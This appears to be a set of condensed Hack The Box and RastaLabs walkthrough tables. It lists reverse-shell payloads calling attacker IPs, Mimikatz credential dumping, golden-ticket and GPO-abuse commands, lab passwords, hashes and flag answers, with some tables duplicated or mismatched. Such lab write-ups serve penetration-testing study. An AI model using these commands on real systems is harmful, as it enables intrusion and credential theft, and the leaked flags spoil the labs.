Network Scenarios
LLMNR Poisoning -> AS-REP Roast -> ForceChangePassword -> GenericWrite -> Password Spraying -> RunForrestRun.exe -> Abusing Vulnerable GPO -> Abusing MSSQL Service Database -> Abusing Domain Trusts
Service Permission -> ForceChangePassword -> Abuse ACLs -> Abuse SQL Instance -> Abuse Service -> Pass the Ticket -> Golden Ticket
AlwaysInstallElevated -> Constrained Delegation -> Unconstrained Delegation (Printer Bug) -> Cross Trust -> Abuse MSSQL Service
Bypass AMSI -> AlwaysInstallElevated -> Constrained Delegation -> Pass the Ticket -> Abuse SQL Instance -> Abuse GPO -> DCSync Attack
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Port scanning with Nmap, adding domain names to the `/etc/hosts` file | `nmap -sC -sV -oA nmap/result 10.10.10.217`, `cat nmap/result.nmap` |
2 | Enumeration | Using Gobuster to find directories, dumping the `.git` directory with GitTools | `gobuster dir -u http://cereal.htb -w wordlist`, `bash gitdumper.sh http://source.cereal.htb/.git/ /root/Desktop/HTB/Cereal/dump/` |
3 | Exploitation | Exploiting cross-site scripting (XSS) to trigger deserialization, creating JWT tokens, uploading a shell | `python3 jwt_tool.py -b -S hs256 -p 'secret'`, `bash extractor.sh ../../dump/ /root/Desktop/HTB/Cereal/all_dump/` |
4 | Gaining Access | Uploading and executing a shell, using Python scripts to automate tasks | `python3 -m http.server 80`, `nc -nvlp 9001`, `python3 dedsec.py`, `curl -k https://source.cereal.htb/uploads/shell.aspx` |
5 | Privilege Escalation | Port forwarding, exploiting the SeImpersonate privilege with JuicyPotato, using GraphQL for SSRF | `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9003 -f exe -o ded.exe`, `curl http://10.10.14.6/ded.exe -o C:\temp\ded.exe`, `nc -nvlp 1337` |
6 | Post-Exploitation | Maintaining access, executing reverse shells | `.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "10.10.14.6 1337 -e powershell" -e HTTP -l 8889` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Online search for lab IP range | N/A |
2 | Enumeration | Port scanning with masscan | `masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0` |
3 | Enumeration | Detailed host scanning with nmap | `nmap` (specific commands not provided) |
4 | Enumeration | Finding domain names with crackmapexec | `crackmapexec` (specific commands not provided) |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | `nmap -sC -sV -oA nmap/result 10.10.10.210` |
2 | Enumeration | Gobuster directory scanning | `gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50` |
3 | Credential Harvesting | Gathering usernames | Gather usernames manually and create a `user.txt` file |
4 | Credential Harvesting | Password spraying | `python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01` |
5 | Phishing | Sending phishing emails | Use Outlook to send phishing emails and capture the NTLMv2 hash with Responder |
6 | Hash Cracking | Cracking NTLMv2 hash | `hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force` |
7 | Access | PowerShell remote session | `$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson` |
8 | Privilege Escalation | Creating a symlink (junction) | `New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'` |
9 | Privilege Escalation | Using Check-File command | `Check-File C:\programdata\root\Desktop\root.txt` |
10 | Exfiltration | Transferring files with nc.exe | `iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | `nmap -sC -sV -oA nmap/result 10.10.10.211` |
2 | Web Enumeration | Checking server with Wappalyzer | Use Wappalyzer to identify backend technologies |
3 | Web Enumeration | Analyzing .git directory | Check the `Gemfile` in the `.git` directory for Ruby and gem versions |
4 | Exploitation | Exploiting Ruby on Rails | Use a Ruby on Rails exploit |
5 | Post-Exploitation | Capturing request in Burp | Capture the request and modify it with the exploit |
6 | Post-Exploitation | Getting a reverse shell | Use a netcat listener and send the exploit to get a reverse shell |
7 | Privilege Escalation | Cracking password hashes | Use John the Ripper to crack password hashes found in `/var/backups` |
8 | Privilege Escalation | Using .google_authenticator file | Use the contents of `.google_authenticator` to bypass two-factor authentication |
9 | Privilege Escalation | Synchronizing time for successful exploit | Adjust the system time to match the timezone for the exploit to work |
10 | Privilege Escalation | Gaining root access with GTFOBins | `sudo gem open -e "/bin/sh -c /bin/sh" rdoc` to gain root access |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | `nmap -sV -sC -oN nmap 10.10.10.237` |
2 | File Analysis | Analyzing executable file | `file heedv1\ Setup\ 1.0.0.exe` |
3 | SMB Enumeration | Enumerating SMB shares | `smbclient -L //10.10.10.237` |
4 | SMB File Transfer | Transferring files via SMB | `smbclient //10.10.10.237/Software_Updates`, then `get UAT_Testing_Procedures.pdf` |
5 | Exploitation | Crafting malicious binary | `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe"` |
6 | YML File Creation | Creating a .yml file for the exploit | Manual creation of the `latest.yml` file |
7 | SMB File Transfer | Uploading .yml file via SMB | `smbclient //10.10.10.237/Software_Updates`, then `put latest.yml` |
8 | Reverse Shell | Obtaining a reverse shell | Use Metasploit to listen for the reverse shell |
9 | Redis Exploitation | Exploiting Redis | `redis-cli -h 10.10.10.237`, then `get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0` |
10 | Password Decryption | Decrypting password | `python3 decrypt.py` with the script provided in the summary |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Data Analysis | Reading pcap file | Use NetworkMiner to read the `.dmp` file and extract the secret file |
2 | Cryptography | Decoding the flag | Use the `filecryptopgraphy.psm1` PowerShell module |
3 | File Preparation | Preparing files for decryption | Rename the secret file to `secret.txt.AES` on ws04 |
4 | Key Conversion | Converting key for decryption | `$key = Get-Content key.txt` |
5 | File Decryption | Decrypting the file | `Unprotect-File '.\secret.txt.AES' -Algorithm AES -Key $key` |
6 | Flag Retrieval | Retrieving the flag | The flag is `RASTA{cryp70_3xf1l7r4710n}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Dumping | Enumerating credentials on WS02 | `Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force` |
2 | Credential Dumping | Using Mimikatz to dump creds | Upload `mimikatz.exe` and execute `sekurlsa::dpapi` to get the master key |
3 | Credential Decryption | Decrypting credentials | `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84...` |
4 | Port Forwarding | Setting up port forwarding | `portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389` |
5 | RDP Connection | Connecting via RDP with Remmina | Install Remmina, import `sql01.rdp`, change the host, export to a `.rdp` file |
6 | RDP Connection | Using xfreerdp to connect | `xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local` |
7 | Flag Retrieval | Retrieving the flag | The flag is `RASTA{c00k1n6_w17h_645_n0w}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Enumeration | Finding LAPS group members | Enumeration to find that `ngodfrey_adm` is part of the LAPS group on WS05 |
2 | Credential Access | Dumping credentials with PowerSploit | `powershell -ep bypass`, then `Import-module ./PowerSploit.psd1` |
3 | Credential Access | Using credentials for access | `$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force`, then `$cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\ngodfrey_adm', $SecPassword)` |
4 | Credential Access | Getting AD object with credentials | `Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred` |
5 | Local Admin Passwords | Retrieving local admin passwords | Passwords are listed for WS01, WS02, WS03, WS04, WS05 |
6 | Port Forwarding | Setting up port forwarding with Meterpreter | `portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445`, and similar for other ports |
7 | Exploitation | Using MS17-010 exploit for admin shell | `exploit/windows/smb/ms17_010_psexec` with lport 80, 443, 8080 |
8 | Flag Retrieval | Retrieving flags from WS02 and WS04 | Flags are `RASTA{3v3ryb0dy_l0v35_l4p5}`, `RASTA{wh3r3_w45_2f4_!?}`, `RASTA{50m371m35_y0u_mu57_b4ck7r4ck}` |
9 | Post-Exploitation | Running Mimikatz on WS02 | `privilege::debug`, then `sekurlsa::logonPasswords` |
10 | File Permissions | Modifying file permissions for flag | `icacls flag.txt /grant administrator:F` or `icacls flag.txt /grant RLAB\ahope:F` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Privilege Escalation | AS-REP Roasting | `Import-module ./asreproast.ps1`, `Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1`, `Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 \| select -expand hash` |
2 | Hash Extraction | Saving Hash | Copy the hash to a txt file and save it with UTF-8 encoding |
3 | Wordlist Creation | Using kwprocessor | `./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt` |
4 | Password Cracking | Using John the Ripper | Use John the Ripper (jumbo version) to crack the hash |
5 | Credential Use | User Enumeration | `net use H: \\fs01.rastalabs.local\home$\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"` |
6 | Flag Retrieval | Accessing Flag | The flag is `RASTA{k3rb3r05_15_7r1cky}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Viewing shares on fs01 | `net view \\fs01 /all` |
2 | Enumeration | Using PowerSploit for enumeration | `powershell -ep bypass`, `Import-module ./PowerSploit.psd1`, `Get-NetShare \\fs01` |
3 | Flag Retrieval | Accessing open shares | Flag is `RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Phishing | Creating phishing HTA | `python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta` |
2 | Web Server Setup | Hosting HTA on Apache2 | `cp index.html launcher.hta /var/www/html`, `service apache2 start` |
3 | Listener Setup | Setting up Metasploit listener | `msfconsole -r unicorn.rc` |
4 | Share Enumeration | Viewing shares on the network | `net share`, `net view`, `net use K: \\hostname\share$`, `net view \\hostname /all` |
5 | User Enumeration | Displaying domain user accounts | `net user /domain` |
6 | User Information | Viewing user info | `net user [username] /domain` |
7 | Group Enumeration | Viewing domain group members | `net group finance /domain` |
8 | Drive Enumeration | Listing logical drives | `fsutil fsinfo drives`, `wmic logicaldisk get name`, `diskpart` then `list volume` |
9 | Network Recon | Pinging servers for IP addresses | `ping DC01`, `ping FS01`, `ping MX01`, `ping NIX01`, `ping SQL01`, `ping WS01`, `ping WS02`, `ping WS03`, `ping WS05` |
10 | Flag Retrieval | Accessing the flag | Flag is `RASTA{w007_f007h0ld_l375_pwn}` |
11 | KeePass Database | Found KeePass database and key file | Located in `M:\Documents` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | User Enumeration | Finding user directory on fs01 | `net user ahope /domain` |
2 | Network Drive Mount | Mounting network drive to access file | `net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"` |
3 | File Conversion | Converting .ppk to OpenSSH format | `puttygen nix01.ppk -O private-openssh -o nix` |
4 | Network Configuration | Adding route and running proxy server | Commands for adding the route and running the socks4a proxy server on ws01 not provided in summary |
5 | SSH Connection | Connecting via SSH with proxychains | `proxychains ssh -i nix ahope@10.10.122.20` |
6 | Privilege Escalation | Using exploit for privilege escalation | Compile the exploit with `gcc exp1.c -o exploit` |
7 | File Transfer | Transferring exploit to target | `proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope` |
8 | File Download | Downloading file from remote to local | `proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta` |
9 | Flag Retrieval | Retrieving the flag | Flag is `RASTA{y0ur3_4_b4ll3r_70_637_7h15}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to ws01 | `portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445` |
2 | Remote Execution | Using Metasploit psexec for shell | Use msf psexec to get a shell on ws01 |
3 | Remote Execution | Using Impacket psexec for shell | Use Impacket psexec to get a shell on ws01, add route in meterpreter |
4 | Proxy Configuration | Setting SOCKS4a proxy in Metasploit | Set socks4a proxy in msf, then edit `/etc/proxychains.conf` |
5 | Enumeration | Using CrackMapExec to enumerate | `proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi` |
6 | Hash Dumping | Dumping hashes | Dump hashes with CrackMapExec and proxychains |
7 | Credential Access | Accessing vault with Mimikatz | Use Mimikatz on ws01 to access vault credentials |
8 | Credential Decryption | Decrypting credentials | `dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey>` |
9 | Impersonation | Impersonating user with Incognito | In meterpreter, load incognito and impersonate rweston |
10 | Clipboard Monitoring | Monitoring clipboard for credentials | Transfer shell to Empire and monitor clipboard |
11 | RDP Connection | Connecting via RDP with credentials | `xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10` |
12 | Flag Retrieval | Retrieving the flag | Flag is `RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to ws05 | `portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445` |
2 | Credential Use | Using rweston_da hash | rweston_da hash: `ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa` |
3 | Exploitation | Exploit via smb/psexec | Use the hash with smb/psexec to exploit |
4 | Flag Retrieval | Retrieving the flag | Flag is `RASTA{53rv1c3_4bu53_f7w}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Using epugh_adm credentials | Log in to web01 (10.10.110.10) and then RDP to sql01 (10.10.122.15) using epugh_adm creds |
2 | Lateral Movement | RDP to fs01 with gopikrishna | RDP to fs01 with user gopikrishna [local admin] |
3 | Malware Execution | Running p0wnedshell.exe | Run `p0wnedshell.exe` from an admin cmd |
4 | Credential Dumping | Invoke Mimikatz from p0wnedshell | Use option 4 in p0wnedshell, invoke Mimikatz to get the rweston_da NTLM hash |
5 | Credential Use | Pass-the-hash with Mimikatz | `sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa` |
6 | Golden Ticket Attack | Perform DCSync to get krbtgt hash | Use option 10 in p0wnedshell, perform DCSync |
7 | Golden Ticket Attack | Generate golden ticket | `kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` |
8 | Golden Ticket Attack | Use golden ticket | `kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` |
9 | Flag Retrieval | Accessing the flag | `pushd \\dc01.rastalabs.local\C$`; flag is `RASTA{r4574l4b5_ch4mp10n}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Access | Using epugh_adm credentials | Log in to web01 (10.10.110.10) |
2 | Lateral Movement | RDP to sql01 with epugh_adm creds | Take RDP of sql01 (10.10.122.15) using epugh_adm credentials |
3 | Database Access | Start SQL Management Studio | Start SQL Management Studio and connect via Windows authentication |
4 | Database Querying | Querying SQL database | `use umbraco;`, `SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'` |
5 | Flag Retrieval | Retrieving the flag from database | `select * from Flag`; flag is `RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Logging in with epugh_adm credentials | `mstsc /v:web01 /u:epugh_adm /p:[password]` |
2 | Lateral Movement | RDP to sql01 using epugh_adm | `mstsc /v:sql01 /u:epugh_adm /p:[password]` |
3 | GPO Enumeration | Enumerating GPO permissions | `Get-NetGPO` |
4 | Group Membership | Checking group members | `net user epugh_adm /domain` |
5 | GPO Permission | Finding GPO with weak permissions | `Get-NetGPO -ComputerName fs01.rastalabs.local` |
6 | OU Enumeration | Finding host with specific policy | `Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}"` |
7 | Policy Enumeration | Identifying applied policy | `Get-NetGPO -ComputerName fs01.rastalabs.local` |
8 | GPO Abuse | Creating and applying immediate tasks | `New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force`, `New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force` |
9 | File Permissions | Modifying permissions for flag.txt | `icacls flag.txt /grant administrators:F` |
10 | Flag Retrieval | Retrieving the flag | Flag is `RASTA{6p0_4bu53_15_h4rdc0r3}` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap scan | `nmap -sC -sV 10.10.10.197` |
2 | DNS Enumeration | Brute-force subdomains | `ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185` |
3 | Email Gathering | Extract emails | Extract emails from `http://sneakycorp.htb/team.php` to `mails.txt` |
4 | Phishing | Send phishing emails | Use `swaks` to send emails to the addresses in `mails.txt` |
5 | Credential Harvesting | Decode credentials | Use Burp Suite to decode credentials from intercepted traffic |
6 | Email Client Setup | Configure email client | Set up `evolution` with the SMTP server and the `paulbyrd@sneakymailer.htb` credentials |
7 | FTP Access | Access FTP | `ftp 10.10.10.197` with the credentials obtained |
8 | Reverse Shell | Upload and trigger reverse shell | Upload `rev.php` via FTP and trigger it with curl |
9 | Privilege Escalation | Add SSH key to authorized keys | Add the generated SSH key to `/home/low/.ssh/authorized_keys` via a malicious package |
10 | Sudo Exploitation | Exploit sudo permissions | Use `sudo /usr/bin/pip3` to execute a malicious package with a reverse shell |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Scanning | Masscan and Nmap | `masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0`, `nmap [options] [target]` |
2 | Web Enumeration | Checking web ports | Access the web service on ports 80 and 443 |
3 | SSL Certificate | Viewing certificate | View SSL certificate details |
4 | Host File Editing | Adding VHOST to hosts file | Edit `/etc/hosts` to add `staging-order.mango.htb` |
5 | NoSQL Injection | Bypassing login | Use Burp Suite to intercept and modify the request for NoSQL injection |
6 | Data Extraction | Automating credential extraction | Run a Python script to extract credentials for the `admin` and `mango` users |
7 | SSH Connection | Accessing SSH | SSH into the server using the extracted credentials |
8 | User Flag Access | Retrieving user flag | Use `su` to log in as `admin` and retrieve the user flag |
9 | Privilege Escalation | Exploiting SUID file | Use the SUID file to read the root flag or exploit it for root access |
10 | Root Flag Access | Reading root flag | Run the binary or use `jjs` to read the root flag |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan | `nmap -sC -sV -oA nmap/result 10.10.10.214` |
2 | Web Vulnerability Scan | Checking for JSON vulnerabilities | Use JSON Beautifier and Validator on `http://10.10.10.214` |
3 | Exploitation | Exploiting CVE-2019-12384 in fasterxml | Create `dedsec.sql` with the payload and serve it with a Python HTTP server |
4 | Initial Access | Gaining a shell as user pericles | Input the crafted JSON to trigger the exploit and gain a shell |
5 | Privilege Escalation | Using timer_backup.sh for privilege escalation | Add your SSH public key to `/root/.ssh/authorized_keys` via `timer_backup.sh` |
6 | Alternative Privilege Escalation | Escalating privileges without SSH key | Use `timer_backup.sh` to add the SUID bit to `/bin/bash` and open a root shell |
7 | Flag Capture | Capturing user and root flags | Use the gained shell to capture `user.txt` and `root.txt` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan | `nmap -sC -sV -oA nmap/result 10.10.10.194` |
2 | Web Enumeration | Checking for JSON vulnerabilities | Use JSON Beautifier and Validator on `http://10.10.10.214` |
3 | Exploitation | Exploiting CVE-2019-12384 in fasterxml | Create `dedsec.sql` with the payload and serve it with a Python HTTP server |
4 | Initial Access | Gaining a shell as user pericles | Input the crafted JSON to trigger the exploit and gain a shell |
5 | Privilege Escalation | Using timer_backup.sh for privilege escalation | Add your SSH public key to `/root/.ssh/authorized_keys` via `timer_backup.sh` |
6 | Alternative Privilege Escalation | Escalating privileges without SSH key | Use `timer_backup.sh` to add the SUID bit to `/bin/bash` and open a root shell |
7 | Flag Capture | Capturing user and root flags | Use the gained shell to capture `user.txt` and `root.txt` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan | `nmap -sC -sV -oA nmap/result 10.10.10.186` |
2 | Web Enumeration | Dirbuster scan | `dirbuster` |
3 | QUIC Protocol Access | Accessing HTTP/3 Protocol | `cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https://quick.htb/` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan | `nmap -T4 -p- -oA forwardslash.scan forwardslash.htb` |
2 | Subdomain Enumeration | WFUZZ fuzzing | Use WFUZZ with common wordlists to find subdomains |
3 | Directory Enumeration | GoBuster scanning | Use GoBuster to enumerate directories |
4 | LFI Vulnerability | Exploiting Local File Inclusion | Use Burp Suite to exploit LFI and directory traversal |
5 | Database Credential Access | Obtaining credentials via LFI | Use LFI to read `var/www/backup.forwardslash.htb/config.php` for database credentials |
6 | API Exploitation | Using php://filter wrapper | Exploit the API with `php://filter/convert.base64_encode/resource` to read files |
7 | FTP Credential Access | Decoding Base64 for credentials | Decode the Base64 to find FTP credentials |
8 | SSH Access | Using FTP credentials for SSH | Use the FTP credentials to access SSH |
9 | User Flag Acquisition | Enumerating user directories | Find and read `user.txt` in the user's directory |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scanning | `nmap -p- -A -T4 poo.htb` |
2 | Directory Enumeration | Fuzzing with WFUZZ | `wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ` |
3 | Exploitation | Exploiting .DS_Store File | Use the `ds_store_exp` tool to extract information from the `.DS_Store` file |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | `nmap -p 1-16000 dyplesher.htb` |
2 | Web Enumeration | WFUZZ Directory Discovery | `wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt` |
3 | Git Repository Cloning | Using GitDumper | `./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher` |
4 | Memcached Credential Access | Using memcached-cli to retrieve credentials | `memcached-cli felamos:zxcvbnm@dyplesher.htb:11211` |
5 | Password Cracking | Using John the Ripper | Use John the Ripper with the retrieved hashes |
6 | Gogs Service Access | Logging into Gogs with cracked credentials | Log into the Gogs service on port 3000 |
7 | Git Bundle Analysis | Unpacking Git Bundles | Move the `.bundle` files to a `Bundle-Unpack` directory and use `git clone` to unpack them |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | `nmap -p 1-16000 dyplesher.htb` |
2 | Web Enumeration | WFUZZ Directory Discovery | `wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt` |
3 | Cloning Exposed Repository | Using GitDumper | `./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher` |
4 | Memcached Credential Access | Using memcached-cli | `memcached-cli felamos:zxcvbnm@dyplesher.htb:11211` |
5 | Cracking Hashes | Using John the Ripper | Use John the Ripper with the retrieved hashes |
6 | Gogs Service Access | Logging into Gogs | Log into the Gogs service on port 3000 |
7 | Git Bundle Analysis | Unpacking Git Bundles | Move the `.bundle` files to a `Bundle-Unpack` directory and use `git clone` to unpack them |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | `nmap -sV -p- -oA cascade.nmap cascade.htb` |
2 | User Enumeration | Enum4Linux | `enum4linux -a cascade.htb` |
3 | LDAP Enumeration | Impacket LDAPSearch | `impacket-ldapsearch -u 'r.thompson' -p 'rY4n5eva'` |
4 | SMB Enumeration | Accessing SMB Shares | `smbclient //cascade.htb/IT -U r.thompson` |
5 | Log Analysis | Reviewing Service Logs | `cat ArkAdRecycleBin.log` |
6 | Registry Analysis | Downloading and Analyzing Registry | `get "VNC Install.reg"`, then `cat "VNC Install.reg"` |
7 | Password Decryption | Decrypting VNC Passwords | Use an online hex decoder or a VNC password decryption tool |
8 | Remote Access | Using Evil-WinRM | `evil-winrm -i cascade.htb -u s.smith -p 'decrypted_password'` |
9 | Share Enumeration | Listing SMB Shares | `smbclient //cascade.htb/Audit$ -U s.smith` |
10 | Database Analysis | Analyzing SQLite Database | Open `Audit.db` with a database viewer like EditPlus |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | `nmap -sV -p- -oA blunder.nmap blunder.htb` |
2 | Web Enumeration | Fuzzing with Extensions | `wfuzz -u http://blunder.htb/FUZZ -w list.txt -t 50 --hw 0` |
3 | Exploit Identification | Searchsploit | `searchsploit bludit` |
4 | Brute Force Attack | Using Custom Script | Custom Python script for brute-forcing |
5 | Exploitation | Metasploit Framework | `msfconsole` and use the exploit for Bludit CMS |
6 | Shell Stabilization | Python TTY Spawn | `python3 -c 'import pty; pty.spawn("/bin/bash")'` |
7 | User Privilege Discovery | Checking Sudo Permissions | `sudo -l` |
8 | Privilege Escalation | Exploiting Sudo Bug CVE-2019-14287 | `sudo -u#-1 /bin/bash` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | `nmap -sC -sV 10.10.10.203` |
2 | SVN Enumeration | SVN Commands | `svn help`, `svn list svn://10.10.10.203` |
3 | Sub-Domain Discovery | Adding Sub-Domains to Hosts | Edit `/etc/hosts` and add the sub-domains |
4 | SVN Log Analysis | Viewing SVN Logs | `svn log svn://10.10.10.203/` |
5 | SVN Diff Analysis | Viewing SVN Diffs | `svn diff -c r2 svn://10.10.10.203` |
6 | Azure DevOps Access | Logging into Azure DevOps | Use the credentials to log into `devops.worker.htb` |
7 | Malicious File Upload | Creating and Uploading ASPX File | Use `msfvenom` to create `payload.aspx` and upload it via a pull request |
8 | Meterpreter Shell | Getting Reverse Shell | Set up a listener with `msfconsole` and navigate to `lens.worker.htb/payload.aspx` |
9 | Post-Exploitation | Meterpreter Commands | `getuid`, `sysinfo`, `cd /users`, `dir` in the meterpreter shell |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scanning | `nmap -sC -sV 10.10.10.95` |
2 | Access Tomcat | Default Credentials | Use the default credentials `tomcat:s3cret` to access Apache Tomcat Manager |
3 | Deploy WAR | MsfVenom WAR File Creation | `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f war > reverse_shell` |
4 | Gain Shell | Netcat Listener | `nc -lvnp 4444`, then access the deployed WAR file to get a shell |
5 | Privilege Check | Whoami Command | `whoami` to check the current user privileges |
6 | Flag Acquisition | Directory Navigation and Reading | Navigate to `C:\Users\Administrator\Desktop\flags` and read `2 for the price of 1.txt` |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Enumeration | Nmap Scanning | `nmap -sC -sV -oN nmap/ 10.10.10.187` |
2 | Accessing FTP | Using Found Credentials | Use the `ftpuser` credentials found in `credentials.txt` |
3 | Exploring Web Server | Checking robots.txt | Access `http://10.10.10.187/robots.txt` to find disallowed entries |
4 | Downloading Files | Using FTP to Download Files | Download `html.tar.gz` and `dump.sql` from the server |
5 | Code Analysis | Reviewing PHP Scripts | Analyze `db_admin.php` and `admin_tasks.php` for potential credentials and functions |
6 | SSH Access | Using Credentials for SSH | Use the `waldo` credentials to access SSH |
7 | Privilege Escalation | Analyzing Sudo Permissions | Run `sudo -l` to check the allowed commands for waldo |
8 | Exploiting Scripts | Using admin_tasks.sh for Privilege Escalation | Exploit the `SETENV` option in sudo to run `admin_tasks.sh` as root |
9 | Gaining Root | Python Path Hijacking | Use `PYTHONPATH` hijacking to get a root shell |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Enumeration | Nmap Scanning | `nmap -sC -sV -p- 10.10.10.200 -v --min-rate=10000` |
2 | Accessing Rsync | Listing Rsync Modules | `nc -vn 10.10.10.200 873`, followed by `list` |
3 | Downloading Backups | Using Rsync to Download Files | `rsync -av rsync://10.10.10.200/conf_backups files` |
4 | Decrypting Backups | Decrypting EncFS | `python encfs2john.py /root/hackthebox/machine/unbalanced/files/ > hash`, `john --wordlist=/usr/share/wordlists/rockyou.txt --progress-every=3 hash` |
5 | Reading Files | Accessing Decrypted Configuration Files | `encfsctl export files decrypt`, then `ls decrypt/` to view the decrypted files |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Information Gathering | Nmap Scanning | `nmap -sV -sC -v -p- --min-rate=10000 10.10.10.197` |
2 | Subdomain Enumeration | Using ffuf for Subdomain Brute-Forcing | `./ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb"` |
